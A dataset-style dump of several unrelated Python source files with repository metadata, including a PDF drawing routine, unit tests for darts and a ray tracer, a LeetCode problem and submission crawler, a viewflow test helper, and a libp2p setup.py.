Point(pl / 2, 0) * progr else: pnt = pnt - Point(0, pl / 2) * progr elif align == 2: # right: right shift by full width if rot in (0, 180): pnt = pnt + Point(pl, 0) * progr else: pnt = pnt - Point(0, pl) * progr elif align == 3: # justify spaces = t.count(" ") # number of spaces in line if spaces > 0 and just_tab[i]: # if any, and we may justify spacing = pl / spaces # make every space this much larger else: spacing = 0 # keep normal space length top = height - pnt.y - self.y left = pnt.x + self.x if rot == 90: left = height - pnt.y - self.y top = -pnt.x - self.x elif rot == 270: left = -height + pnt.y + self.y top = pnt.x + self.x elif rot == 180: left = -pnt.x - self.x top = -height + pnt.y + self.y nres += templ % (left, top, fname, fontsize) if render_mode > 0: nres += "%i Tr " % render_mode if spacing != 0: nres += "%g Tw " % spacing if color is not None: nres += color_str if fill is not None: nres += fill_str if border_width != 1: nres += "%g w " % border_width nres += "%sTJ\n" % getTJstr(t, tj_glyphs, simple, ordering) nres += "ET Q\n" self.text_cont += nres self.updateRect(rect) return more def finish( self, width=1, color=None, fill=None, lineCap=0, lineJoin=0, roundCap=None, dashes=None, even_odd=False, morph=None, closePath=True ): """Finish the current drawing segment. Notes: Apply stroke and fill colors, dashes, line style and width, or morphing. Also determines whether any open path should be closed by a connecting line to its start point. """ if self.draw_cont == "": # treat empty contents as no-op return if roundCap is not None: warnings.warn("roundCap is replaced by lineCap / lineJoin", DeprecationWarning) lineCap = lineJoin = roundCap if width == 0: # border color makes no sense then color = None elif color is None: # vice versa width = 0 color_str = ColorCode(color, "c") # ensure proper color string fill_str = ColorCode(fill, "f") # ensure proper fill string if width not in (0, 1): self.draw_cont += "%g w\n" % width if lineCap + lineJoin > 0: self.draw_cont += "%i J %i j\n" % (lineCap, lineJoin) if dashes is not None and len(dashes) > 0: self.draw_cont += "%s d\n" % dashes if closePath: self.draw_cont += "h\n" self.lastPoint = None if color is not None: self.draw_cont += color_str if fill is not None: self.draw_cont += fill_str if color is not None: if not even_odd: self.draw_cont += "B\n" else: self.draw_cont += "B*\n" else: if not even_odd: self.draw_cont += "f\n" else: self.draw_cont += "f*\n" else: self.draw_cont += "S\n" if CheckMorph(morph): m1 = Matrix(1, 0, 0, 1, morph[0].x + self.x, self.height - morph[0].y - self.y) mat = ~m1 * morph[1] * m1 self.draw_cont = "%g %g %g %g %g %g cm\n" % JM_TUPLE(mat) + self.draw_cont self.totalcont += "\nq\n" + self.draw_cont + "Q\n" self.draw_cont = "" self.lastPoint = None return def commit(self, overlay=True): """Update the page's /Contents object with Shape data. The argument controls whether data appear in foreground (default) or background. """ CheckParent(self.page) # doc may have died meanwhile self.totalcont += self.text_cont if not fitz_py2: # need bytes if Python > 2 self.totalcont = bytes(self.totalcont, "utf-8") # make /Contents object with dummy stream xref = TOOLS._insert_contents(self.page, b" ", overlay) # update it with potential compression self.doc._updateStream(xref, self.totalcont) self.lastPoint = None # clean up ... self.rect = None # self.draw_cont = "" # for possible ... self.text_cont = "" # ... self.totalcont = "" # re-use return
36.734792
203
0.492287
795a9fcfcd2c53197c31c0c6904812fa36cba2a7
2,457
py
Python
darts/tests/test_transformer.py
LeoTafti/darts
210605fafb730de564e3d723ab3919ed94da42b9
[ "Apache-2.0" ]
null
null
null
darts/tests/test_transformer.py
LeoTafti/darts
210605fafb730de564e3d723ab3919ed94da42b9
[ "Apache-2.0" ]
null
null
null
darts/tests/test_transformer.py
LeoTafti/darts
210605fafb730de564e3d723ab3919ed94da42b9
[ "Apache-2.0" ]
null
null
null
import unittest import logging import numpy as np from sklearn.preprocessing import MinMaxScaler, StandardScaler from ..preprocessing import ScalerWrapper from ..utils import timeseries_generation as tg class TransformerTestCase(unittest.TestCase): __test__ = True series1 = tg.random_walk_timeseries(length=100) * 20 - 10. series2 = series1.stack(tg.random_walk_timeseries(length=100) * 20 - 100.) @classmethod def setUpClass(cls): logging.disable(logging.CRITICAL) def test_scaling(self): self.series3 = self.series1[:1] transformer1 = ScalerWrapper(MinMaxScaler(feature_range=(0, 2))) transformer2 = ScalerWrapper(StandardScaler()) series1_tr1 = transformer1.fit_transform(self.series1) series1_tr2 = transformer2.fit_transform(self.series1) series3_tr2 = transformer2.transform(self.series3) transformer3 = ScalerWrapper(MinMaxScaler(feature_range=(0, 2))) transformer4 = ScalerWrapper(StandardScaler()) series2_tr3 = transformer3.fit_transform(self.series2) series2_tr4 = transformer4.fit_transform(self.series2) # should comply with scaling constraints self.assertAlmostEqual(min(series1_tr1.values().flatten()), 0.) self.assertAlmostEqual(max(series1_tr1.values().flatten()), 2.) self.assertAlmostEqual(np.mean(series1_tr2.values().flatten()), 0.) self.assertAlmostEqual(np.std(series1_tr2.values().flatten()), 1.) self.assertAlmostEqual(min(series2_tr3.values().flatten()), 0.) self.assertAlmostEqual(max(series2_tr3.values().flatten()), 2.) self.assertAlmostEqual(np.mean(series2_tr4.values().flatten()), 0.) self.assertAlmostEqual(np.std(series2_tr4.values().flatten()), 1.) # test inverse transform series1_recovered = transformer2.inverse_transform(series1_tr2) series2_recovered = transformer3.inverse_transform(series2_tr3) series3_recovered = transformer2.inverse_transform(series3_tr2) np.testing.assert_almost_equal(series1_recovered.values().flatten(), self.series1.values().flatten()) np.testing.assert_almost_equal(series2_recovered.values().flatten(), self.series2.values().flatten()) self.assertEqual(series1_recovered.width, self.series1.width) self.assertEqual(series2_recovered.width, self.series2.width) self.assertEqual(series3_recovered, series1_recovered[:1])
44.672727
109
0.726496
795a9fe6a8cbac736c6591b593f8010cd49119a3
22,210
py
Python
leetcode-crawler.py
liuyang2356/leetcode-crawler
cdb9fca7e97fb00c00295c7db68d8bd6ff491461
[ "MIT" ]
35
2019-04-17T07:37:37.000Z
2022-01-26T07:19:17.000Z
leetcode-crawler.py
liuyang2356/leetcode-crawler
cdb9fca7e97fb00c00295c7db68d8bd6ff491461
[ "MIT" ]
4
2020-04-07T15:22:21.000Z
2022-01-23T21:41:39.000Z
leetcode-crawler.py
liuyang2356/leetcode-crawler
cdb9fca7e97fb00c00295c7db68d8bd6ff491461
[ "MIT" ]
18
2019-08-25T14:45:32.000Z
2022-02-27T15:46:41.000Z
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import sqlite3 import json import traceback import html2text import os import requests from requests_toolbelt import MultipartEncoder import random,time import re import argparse,sys import threading db_path = 'leetcode.db' user_agent = r'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36' def initLock(l): global lock lock = l threadLock = threading.Lock() # 获取题目信息线程 class insetQuestionThread(threading.Thread): def __init__(self, title_slug, *args): threading.Thread.__init__(self) self.title_slug = title_slug self.status = None if len(args) == 1: self.status = args[0] def run(self): IS_SUCCESS = False conn = sqlite3.connect(db_path, timeout=10) while not IS_SUCCESS: try: # 休眠随机 1-3 秒,以免爬去频率过高被服务器禁掉 time.sleep(random.randint(1, 3)) cursor = conn.cursor() session = requests.Session() headers = {'User-Agent': user_agent, 'Connection': 'keep-alive', 'Content-Type': 'application/json', 'Referer': 'https://leetcode.com/problems/' + self.title_slug} url = "https://leetcode.com/graphql" params = {'operationName': "getQuestionDetail", 'variables': {'titleSlug': self.title_slug}, 'query': '''query getQuestionDetail($titleSlug: String!) { question(titleSlug: $titleSlug) { questionId questionFrontendId questionTitle questionTitleSlug content difficulty stats similarQuestions categoryTitle topicTags { name slug } } }''' } json_data = json.dumps(params).encode('utf8') question_detail = () resp = session.post(url, data = json_data, headers = headers, timeout = 10) content = resp.json() questionId = content['data']['question']['questionId'] tags = [] for tag in content['data']['question']['topicTags']: tags.append(tag['name']) if content['data']['question']['content'] != None: question_detail = (questionId, content['data']['question']['questionFrontendId'], content['data']['question']['questionTitle'], content['data']['question']['questionTitleSlug'], content['data']['question']['difficulty'], content['data']['question']['content'], self.status) threadLock.acquire() cursor.execute('INSERT INTO question (id, frontend_id, title, slug, difficulty, content, status) VALUES (?, ?, ?, ?, ?, ?, ?)', question_detail) for tag in tags: question_tag = (questionId, tag) cursor.execute('INSERT INTO question_tag (question_id, tag) VALUES (?, ?)', question_tag) conn.commit() print("insert question [%s] success" %(self.title_slug)) threadLock.release() IS_SUCCESS = True # 若出现连接超时或连接错误则继续获取 except (requests.exceptions.Timeout,requests.exceptions.ConnectionError) as error: print(str(error)) cursor.close() conn.close() class LeetcodeCrawler(): def __init__(self): self.session = requests.Session() self.csrftoken = '' self.is_login = False # 获取到 token def get_csrftoken(self): url = 'https://leetcode.com' cookies = self.session.get(url).cookies for cookie in cookies: if cookie.name == 'csrftoken': self.csrftoken = cookie.value break # 登陆 leetcode 账号 def login(self, username, password): url = "https://leetcode.com/accounts/login" params_data = { 'csrfmiddlewaretoken': self.csrftoken, 'login': username, 'password':password, 'next': 'problems' } headers = {'User-Agent': user_agent, 'Connection': 'keep-alive', 'Referer': 'https://leetcode.com/accounts/login/', "origin": "https://leetcode.com"} m = MultipartEncoder(params_data) headers['Content-Type'] = m.content_type self.session.post(url, headers = headers, data = m, timeout = 10, allow_redirects = False) self.is_login = self.session.cookies.get('LEETCODE_SESSION') != None return self.is_login def get_problems(self, filters): url = "https://leetcode.com/api/problems/all/" headers = {'User-Agent': user_agent, 'Connection': 'keep-alive'} resp = self.session.get(url, headers = headers, timeout = 10) question_list = json.loads(resp.content.decode('utf-8')) question_update_list = [] threads = [] cursor = self.conn.cursor() for question in question_list['stat_status_pairs']: question_id = question['stat']['question_id'] question_slug = question['stat']['question__title_slug'] question_status = question['status'] question_difficulty = "None" level = question['difficulty']['level'] if level == 1: question_difficulty = "Easy" elif level == 2: question_difficulty = "Medium" elif level == 3: question_difficulty = "Hard" if filters.get('difficulty'): if filters['difficulty'] != question_difficulty: continue if filters.get('status'): if filters['status'] != question_status: continue if question['paid_only']: continue cursor.execute('SELECT status FROM question WHERE id = ?', (question_id,)) result = cursor.fetchone() if not result: # 创建新线程 thread = insetQuestionThread(question_slug, question_status) thread.start() while True: #判断正在运行的线程数量,如果小于5则退出while循环, #进入for循环启动新的进程.否则就一直在while循环进入死循环 if(len(threading.enumerate()) < 60): break # 添加线程到线程列表 threads.append(thread) elif self.is_login and question_status != result[0]: question_update_list.append((question_status, question_id)) for t in threads: t.join() cursor.executemany('UPDATE question SET status = ? WHERE id = ?', question_update_list) self.conn.commit() cursor.close() def connect_db(self, db_path): self.conn = sqlite3.connect(db_path, timeout = 10) cursor = self.conn.cursor() query_table_exists = "SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name = 'question';" cursor.execute(query_table_exists) if cursor.fetchone()[0] == 0: cursor.execute('''CREATE TABLE question (id INT PRIMARY KEY NOT NULL, frontend_id INT NOT NULL, title CHAR(50) NOT NULL, slug CHAR(50) NOT NULL, difficulty CHAR(10) NOT NULL, content TEXT NOT NULL, status CHAR(10));''') query_table_exists = "SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name = 'last_ac_submission_record';" cursor.execute(query_table_exists) if cursor.fetchone()[0] == 0: cursor.execute('''CREATE TABLE last_ac_submission_record (id INT PRIMARY KEY NOT NULL, question_slug CHAR(50) NOT NULL, timestamp INT NOT NULL, language CHAR(10) NOT NULL, code TEXT, runtime CHAR(10));''') query_table_exists = "SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name = 'question_tag';" cursor.execute(query_table_exists) if cursor.fetchone()[0] == 0: cursor.execute('''CREATE TABLE question_tag (question_id INT NOT NULL, tag CHAR(30) NOT NULL);''') cursor.close() def generate_questions_markdown(self, path, filters): if not os.path.isdir(path): os.mkdir(path) cursor = self.conn.cursor() cursor.execute("SELECT * FROM question") for row in cursor: question_detail = { 'id': row[0], 'frontedId': row[1], 'title': row[2], 'slug': row[3], 'difficulty': row[4], 'content': row[5], 'status': row[6] } if not self.filter_question(question_detail, filters): continue tags = '' tag_cursor = self.conn.cursor() tag_cursor.execute('SELECT tag FROM question_tag WHERE question_id = ?', (row[0],)) tag_list = tag_cursor.fetchall() for tag in tag_list: tags += tag[0] + ', ' if len(tags) > 2: tags = tags[:-2] question_detail['tags'] = tags has_get_code = filters.__contains__('code') self.generate_question_markdown(question_detail, path, has_get_code) cursor.close() def filter_question(self, question_detail, filters): if filters.get('difficulty'): if filters['difficulty'] != question_detail['difficulty']: return False if filters.get('status'): if filters['status'] != question_detail['status']: return False tag_cursor = self.conn.cursor() tag_cursor.execute('SELECT tag FROM question_tag WHERE question_id = ?', (question_detail['id'],)) tag_list = tag_cursor.fetchall() tag_cursor.close() if filters.get('tags'): tag_count = 0 for tag in tag_list: if tag[0] in filters['tags']: tag_count += 1 if tag_count != len(filters['tags']): return False return True def get_ac_question_submission(self, filters): if not self.is_login: return sql = "SELECT id,slug,difficulty,status FROM question WHERE status = 'ac';" cursor = self.conn.cursor() cursor.execute(sql) results = cursor.fetchall() threads = [] slug_list = [] for row in results: question_detail = { 'id': row[0], 'slug': row[1], 'difficulty': row[2], 'status': row[3] } if not self.filter_question(question_detail, filters): continue slug = question_detail['slug'] slug_list.append(question_detail['slug']) IS_SUCCESS = False while not IS_SUCCESS: try: url = "https://leetcode.com/graphql" params = {'operationName': "Submissions", 'variables':{"offset":0, "limit":20, "lastKey": '', "questionSlug": slug}, 'query': '''query Submissions($offset: Int!, $limit: Int!, $lastKey: String, $questionSlug: String!) { submissionList(offset: $offset, limit: $limit, lastKey: $lastKey, questionSlug: $questionSlug) { lastKey hasNext submissions { id statusDisplay lang runtime timestamp url isPending __typename } __typename } }''' } json_data = json.dumps(params).encode('utf8') headers = {'User-Agent': user_agent, 'Connection': 'keep-alive', 'Referer': 'https://leetcode.com/accounts/login/', "Content-Type": "application/json", 'x-csrftoken': self.csrftoken} resp = self.session.post(url, data = json_data, headers = headers, timeout = 10) content = resp.json() for submission in content['data']['submissionList']['submissions']: if submission['statusDisplay'] == "Accepted": cursor.execute("SELECT COUNT(*) FROM last_ac_submission_record WHERE id =" + str(submission['id'])) if cursor.fetchone()[0] == 0: IS_GET_SUBMISSION_SUCCESS = False while not IS_GET_SUBMISSION_SUCCESS: code_content = self.session.get("https://leetcode.com" + submission['url'], headers = headers, timeout = 10) pattern = re.compile( r'submissionCode: \'(?P<code>.*)\',\n editCodeUrl', re.S ) m1 = pattern.search(code_content.text) code = m1.groupdict()['code'] if m1 else None if not code: print('WARN: Can not get [{}] solution code'.format(slug)) continue IS_GET_SUBMISSION_SUCCESS = True submission_detail = (submission['id'], slug, submission['timestamp'], submission['lang'], submission['runtime'], code) cursor.execute("INSERT INTO last_ac_submission_record (id, question_slug, timestamp, language, runtime, code) VALUES(?, ?, ?, ?, ?, ?)", submission_detail) print("insert submission[%s] success" % (submission['id'])) self.conn.commit() IS_SUCCESS = True break except (requests.exceptions.Timeout,requests.exceptions.ConnectionError) as error: print(str(error)) finally: pass cursor.close() def generate_question_markdown(self, question, path, has_get_code): text_path = os.path.join(path, "{:0>3d}-{}".format(question['frontedId'], question['slug'])) if not os.path.isdir(text_path): os.mkdir(text_path) with open(os.path.join(text_path, "README.md"), 'w', encoding='utf-8') as f: f.write("# [{}][title]\n".format(question['title'])) f.write("\n## Description\n\n") text = question['content'] content = html2text.html2text(text).replace("**Input:**", "Input:").replace("**Output:**", "Output:").replace('**Explanation:**', 'Explanation:').replace('\n ', ' ') f.write(content) f.write("\n**Tags:** {}\n".format(question['tags'])) f.write("\n**Difficulty:** {}\n".format(question['difficulty'])) f.write("\n## 思路\n") if self.is_login and has_get_code: sql = "SELECT code, language FROM last_ac_submission_record WHERE question_slug = ? ORDER BY timestamp" cursor = self.conn.cursor() cursor.execute(sql, (question['slug'],)) submission = cursor.fetchone() cursor.close() if submission != None: f.write("\n``` %s\n" %(submission[1])) f.write(submission[0].encode('utf-8').decode('unicode_escape')) f.write("\n```\n") f.write("\n[title]: https://leetcode.com/problems/{}\n".format(question['slug'])) def generate_questions_submission(self, path, filters): if not self.is_login: return sql = """ SELECT l.question_slug, l.code,l.language, q.frontend_id,max(l.timestamp) FROM last_ac_submission_record as l,question as q WHERE l.question_slug == q.slug and q.status = 'ac' GROUP BY l.question_slug """ cursor = self.conn.cursor() cursor.execute(sql) filter_cursor = self.conn.cursor() for submission in cursor: filter_cursor.execute("SELECT id,slug,difficulty,status FROM question WHERE slug = ?", (submission[0],)) result = filter_cursor.fetchone() question_detail = { 'id': result[0], 'slug': result[1], 'difficulty': result[2], 'status': result[3] } if not self.filter_question(question_detail, filters): continue self.generate_question_submission(path, submission) cursor.close() filter_cursor.close() def generate_question_submission(self, path, submission): if not os.path.isdir(path): os.mkdir(path) text_path = os.path.join(path, "{:0>3d}-{}".format(submission[3], submission[0])) if not os.path.isdir(text_path): os.mkdir(text_path) with open(os.path.join(text_path, "solution.class"), 'w', encoding='utf-8') as f: f.write(submission[1].encode('utf-8').decode('unicode_escape')) def close_db(self): self.conn.close() if __name__=='__main__': parser = argparse.ArgumentParser() parser.add_argument("output", nargs = '?', default="note") parser.add_argument('-d', '--difficulty', nargs = '+', choices = ['Easy', 'Medium', 'Hard'], help = "Specify the difficulty.\n" "If not specified, all problems will be grasped.") parser.add_argument('-t', '--tags', nargs = '+', help = "Specify the tag") parser.add_argument('-v', '--verbose', action = "store_true", default = False, help = "Verbose output") parser.add_argument('-s', '--status', nargs='+', choices=['ac', 'notac', 'none'], help="Specify the probelms statu.\n" "If not specified, all problems will be grasped.") parser.add_argument('-c', '--code', nargs='+', help="Code solution output path.") parser.add_argument('-u', '--username', nargs='+', help="username") parser.add_argument('-p', '--password', nargs='+', help="password") if len(sys.argv) > 1: args = parser.parse_args() else: parser.print_help() sys.exit(1) argsDict = vars(args) filters = {} test = LeetcodeCrawler() test.get_csrftoken() login_flag = True if argsDict.get('code') or argsDict.get('status'): if not (argsDict.get('username') and argsDict.get('password')): print("ERROR: choice problem by statu or generate submission code must set username and password!") sys.exit() else: is_login = test.login(args.username[0], args.password[0]) if not is_login: print("ERROR: login account fail!") sys.exit() if argsDict.get('code'): filters['code'] = args.code if args.verbose: print('Specified code path is: {}'.format(args.code)) if argsDict.get('status'): filters['status'] = args.status[0] if args.verbose: print('Specified statu is: {}'.format(args.status)) if argsDict.get('difficulty') or argsDict.get('tags'): if argsDict.get('difficulty'): filters["difficulty"] = args.difficulty[0] if args.verbose: print('Specified difficulty is: {}'.format(args.difficulty)) if argsDict.get('tags'): filters['tags'] = args.tags if args.verbose: print('Specified tag is: {}'.format(args.tags)) test.connect_db(db_path) test.get_problems(filters) if argsDict.get('code'): test.get_ac_question_submission(filters) test.generate_questions_submission(args.output, filters) test.generate_questions_markdown(args.output, filters) test.close_db()
41.282528
187
0.492076
795aa14b199c3b47d6aa5b76caecfc3031f3d053
1,190
py
Python
tests/test_rays.py
toku345/RayTracerChallenge_Python
40ced097f92cc61b116d24c6d6c4f27d6b13029d
[ "MIT" ]
1
2020-05-13T20:54:01.000Z
2020-05-13T20:54:01.000Z
tests/test_rays.py
toku345/RayTracerChallenge_Python
40ced097f92cc61b116d24c6d6c4f27d6b13029d
[ "MIT" ]
null
null
null
tests/test_rays.py
toku345/RayTracerChallenge_Python
40ced097f92cc61b116d24c6d6c4f27d6b13029d
[ "MIT" ]
null
null
null
from raytracerchallenge_python.ray import Ray from raytracerchallenge_python.transformations import translation, scaling from raytracerchallenge_python.tuple import Point, Vector def test_creating_and_querying_a_ray(): # Given origin = Point(1, 2, 3) direction = Vector(4, 5, 6) # When r = Ray(origin, direction) # Then assert r.origin == origin assert r.direction == direction def test_computing_a_point_from_a_distance(): # Given r = Ray(Point(2, 3, 4), Vector(1, 0, 0)) # Then assert r.position(0) == Point(2, 3, 4) assert r.position(1) == Point(3, 3, 4) assert r.position(-1) == Point(1, 3, 4) assert r.position(2.5) == Point(4.5, 3, 4) def test_translating_a_ray(): # Given r = Ray(Point(1, 2, 3), Vector(0, 1, 0)) m = translation(3, 4, 5) # When r2 = r.transform(m) # Then assert r2.origin == Point(4, 6, 8) assert r2.direction == Vector(0, 1, 0) def test_scaling_a_ray(): # Given r = Ray(Point(1, 2, 3), Vector(0, 1, 0)) m = scaling(2, 3, 4) # When r2 = r.transform(m) # Then assert r2.origin == Point(2, 6, 12) assert r2.direction == Vector(0, 3, 0)
25.319149
74
0.617647
795aa153df84bd95205ccc21208432b0e1e32e27
3,890
py
Python
backoffice/web/grant_management/tests/helpers.py
uktrade/trade-access-program
8fb565e96de7d7bb0bde31255aef0f291063e93c
[ "MIT" ]
1
2021-03-04T15:24:12.000Z
2021-03-04T15:24:12.000Z
backoffice/web/grant_management/tests/helpers.py
uktrade/trade-access-program
8fb565e96de7d7bb0bde31255aef0f291063e93c
[ "MIT" ]
7
2020-08-24T13:27:02.000Z
2021-06-09T18:42:31.000Z
backoffice/web/grant_management/tests/helpers.py
uktrade/trade-access-program
8fb565e96de7d7bb0bde31255aef0f291063e93c
[ "MIT" ]
1
2021-05-20T07:40:00.000Z
2021-05-20T07:40:00.000Z
from django.urls import reverse from django.utils import timezone from rest_framework.status import HTTP_200_OK from web.grant_management.flows import GrantManagementFlow from web.grant_management.models import GrantManagementProcess class GrantManagementFlowTestHelper: DEFAULT_TASK_PAYLOADS = { 'verify_previous_applications': {'previous_applications_is_verified': True}, 'verify_event_commitment': {'event_commitment_is_verified': True}, 'verify_business_entity': {'business_entity_is_verified': True}, 'verify_state_aid': {'state_aid_is_verified': False}, 'products_and_services': { 'products_and_services_score': 5, 'products_and_services_justification': 'Blah blah blah' }, 'products_and_services_competitors': { 'products_and_services_competitors_score': 5, 'products_and_services_competitors_justification': 'Blah blah blah' }, 'export_strategy': { 'export_strategy_score': 5, 'export_strategy_justification': 'Blah blah blah' }, 'event_is_appropriate': {'event_is_appropriate': True}, 'decision': {'decision': GrantManagementProcess.Decision.APPROVED}, } def _assign_task(self, process, task): # Check task is unassigned self.assertIsNone(task.assigned) # Assign task to current logged in user self.apl_ack_assign_url = reverse( f'viewflow:grant_management:grantmanagement:{task.flow_task.name}__assign', kwargs={'process_pk': process.pk, 'task_pk': task.pk}, ) response = self.client.post(self.apl_ack_assign_url, follow=True) self.assertEqual(response.status_code, HTTP_200_OK) # Check task is assigned task.refresh_from_db() self.assertIsNotNone(task.assigned) return response, task def _complete_task(self, process, task, data=None, make_asserts=True): data = data or {} # Required as explained here https://github.com/viewflow/viewflow/issues/100 data['_viewflow_activation-started'] = timezone.now().strftime("%Y-%m-%d %H:%M") self.apl_ack_task_url = reverse( f'viewflow:grant_management:grantmanagement:{task.flow_task.name}', kwargs={'process_pk': process.pk, 'task_pk': task.pk}, ) response = self.client.post(self.apl_ack_task_url, data=data, follow=True) task.refresh_from_db() process.refresh_from_db() if make_asserts: if 'form' in getattr(response, 'context_data', {}): self.assertTrue( response.context_data['form'].is_valid(), msg=response.context_data['form'].errors.as_data() ) self.assertIsNotNone(task.finished) return response, task def _start_process_and_step_through_until(self, task_name='end'): """ Helper method to step through the process flow up to the provided task_name. If task_name not provided step through until end of process flow. """ # start flow ga_process = GrantManagementFlow.start.run(grant_application=self.ga) # Get next task next_task = ga_process.active_tasks().first() while next_task and next_task.flow_task.name != task_name: # Complete next task if it is a HUMAN task if next_task.flow_task_type == 'HUMAN': _, next_task = self._assign_task(ga_process, next_task) self._complete_task( ga_process, next_task, data=self.DEFAULT_TASK_PAYLOADS.get(next_task.flow_task.name) ) # Get next task next_task = ga_process.active_tasks().first() ga_process.refresh_from_db() return ga_process
39.292929
88
0.648329
795aa1ff0722ed94c27600d2294b02735525a03d
3,905
py
Python
setup.py
Jacquelinevv0693/py-libp2p
e5f7aecce0eec78082d7bc8c439d57fbc93a693f
[ "Apache-2.0", "MIT" ]
315
2019-02-13T01:29:09.000Z
2022-03-28T13:44:07.000Z
setup.py
Jacquelinevv0693/py-libp2p
e5f7aecce0eec78082d7bc8c439d57fbc93a693f
[ "Apache-2.0", "MIT" ]
249
2019-02-22T05:00:07.000Z
2022-03-29T16:30:46.000Z
setup.py
Jacquelinevv0693/py-libp2p
e5f7aecce0eec78082d7bc8c439d57fbc93a693f
[ "Apache-2.0", "MIT" ]
77
2019-02-24T19:45:17.000Z
2022-03-30T03:20:09.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- import os from setuptools import find_packages, setup extras_require = { "test": [ "pytest>=4.6.3,<5.0.0", "pytest-xdist>=1.30.0", "pytest-trio>=0.5.2", "factory-boy>=2.12.0,<3.0.0", ], "lint": [ "flake8==3.7.9", # flake8 is not semver: it has added new warnings at minor releases "isort==4.3.21", "mypy==0.780", # mypy is not semver: it has added new warnings at minor releases "mypy-protobuf==1.15", "black==19.3b0", "flake8-bugbear>=19.8.0,<20", "docformatter>=1.3.1,<2", "trio-typing~=0.5.0", ], "doc": [ "Sphinx>=2.2.1,<3", "sphinx_rtd_theme>=0.4.3,<=1", "towncrier>=19.2.0, <20", ], "dev": [ "bumpversion>=0.5.3,<1", "pytest-watch>=4.1.0,<5", "wheel", "twine", "ipython", "setuptools>=36.2.0", "tox>=3.13.2,<4.0.0", ], } extras_require["dev"] = ( extras_require["dev"] + extras_require["test"] + extras_require["lint"] + extras_require["doc"] ) fastecdsa = [ # No official fastecdsa==1.7.4,1.7.5 wheels for Windows, using a pypi package that includes # the original library, but also windows-built wheels (32+64-bit) on those versions. # Fixme: Remove section when fastecdsa has released a windows-compatible wheel # (specifically: both win32 and win_amd64 targets) # See the following issues for more information; # https://github.com/libp2p/py-libp2p/issues/363 # https://github.com/AntonKueltz/fastecdsa/issues/11 "fastecdsa-any==1.7.5;sys_platform=='win32'", # Wheels are provided for these platforms, or compiling one is minimally frustrating in a # default python installation. "fastecdsa==1.7.5;sys_platform!='win32'", ] with open("./README.md") as readme: long_description = readme.read() install_requires = [ "pycryptodome>=3.9.2,<4.0.0", "base58>=1.0.3,<2.0.0", "pymultihash>=0.8.2", "multiaddr>=0.0.9,<0.1.0", "rpcudp>=3.0.0,<4.0.0", "lru-dict>=1.1.6", "protobuf>=3.10.0,<4.0.0", "coincurve>=10.0.0,<11.0.0", "pynacl==1.3.0", "dataclasses>=0.7, <1;python_version<'3.7'", "async_generator==1.10", "trio>=0.15.0", "async-service>=0.1.0a6", "async-exit-stack==1.0.1", "noiseprotocol>=0.3.0,<0.4.0", ] # NOTE: Some dependencies break RTD builds. We can not install system dependencies on the # RTD system so we have to exclude these dependencies when we are in an RTD environment. readthedocs_is_building = os.environ.get("READTHEDOCS", False) if not readthedocs_is_building: install_requires.extend(fastecdsa) setup( name="libp2p", # *IMPORTANT*: Don't manually change the version here. Use `make bump`, as described in readme version="0.1.5", description="libp2p implementation written in python", long_description=long_description, long_description_content_type="text/markdown", maintainer="The Ethereum Foundation", maintainer_email="snakecharmers@ethereum.org", url="https://github.com/libp2p/py-libp2p", include_package_data=True, install_requires=install_requires, python_requires=">=3.6,<4", extras_require=extras_require, py_modules=["libp2p"], license="MIT/APACHE2.0", zip_safe=False, keywords="libp2p p2p", packages=find_packages(exclude=["tests", "tests.*"]), classifiers=[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "License :: OSI Approved :: Apache Software License", "Natural Language :: English", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.6", "Programming Language :: Python :: 3.7", ], platforms=["unix", "linux", "osx"], )
31.747967
98
0.616389
795aa2648dcf8a74f86b25c4a1ae2f927f202bc2
795
py
Python
scripts/give_id_reduced.py
klaricch/Transposons2
a0f216e7a3ad8c462706237953325ad0b13a5646
[ "MIT" ]
1
2018-04-17T16:48:04.000Z
2018-04-17T16:48:04.000Z
scripts/give_id_reduced.py
klaricch/Transposons2
a0f216e7a3ad8c462706237953325ad0b13a5646
[ "MIT" ]
null
null
null
scripts/give_id_reduced.py
klaricch/Transposons2
a0f216e7a3ad8c462706237953325ad0b13a5646
[ "MIT" ]
null
null
null
#!/usr/bin/env python import re in_one="/lscr2/andersenlab/kml436/git_repos2/Transposons2/results/final_results/T_kin_C_matrix_full_reduced.txt" OUT_ONE=open("/lscr2/andersenlab/kml436/git_repos2/Transposons2/results/final_results/T_kin_C_matrix_full_id_reduced.txt", 'w') MASTER_ONE=open("/lscr2/andersenlab/kml436/git_repos2/Transposons2/results/final_results/key_T_kin_C_matrix_full_id_reduced.txt", 'w') count=1 with open(in_one, 'r') as IN: header=next(IN) OUT_ONE.write(header) for line in IN: line=line.rstrip('\n') items=re.split("[\t]",line) TE=items[0] MASTER_ONE.write(TE + '\t' + "T" + str(count) + '\n') OUT_ONE.write("T"+str(count)) for i in items[1:len(items)]: OUT_ONE.write('\t' + i) OUT_ONE.write('\n') count +=1 OUT_ONE.close() MASTER_ONE.close()
28.392857
134
0.733333
795aa4f158e93ed867a049daf24ec5d9aca3a097
6,126
py
Python
python/gdata/tests/atom_tests/http_core_test.py
vlinhd11/vlinhd11-android-scripting
c90f04eb26a3746f025a6a0beab92bb6aa88c084
[ "Apache-2.0" ]
2,293
2015-01-02T12:46:10.000Z
2022-03-29T09:45:43.000Z
python/gdata/tests/atom_tests/http_core_test.py
weiqiangzheng/sl4a
d3c17dca978cbeee545e12ea240a9dbf2a6999e9
[ "Apache-2.0" ]
315
2015-05-31T11:55:46.000Z
2022-01-12T08:36:37.000Z
python/gdata/tests/atom_tests/http_core_test.py
weiqiangzheng/sl4a
d3c17dca978cbeee545e12ea240a9dbf2a6999e9
[ "Apache-2.0" ]
1,033
2015-01-04T07:48:40.000Z
2022-03-24T09:34:37.000Z
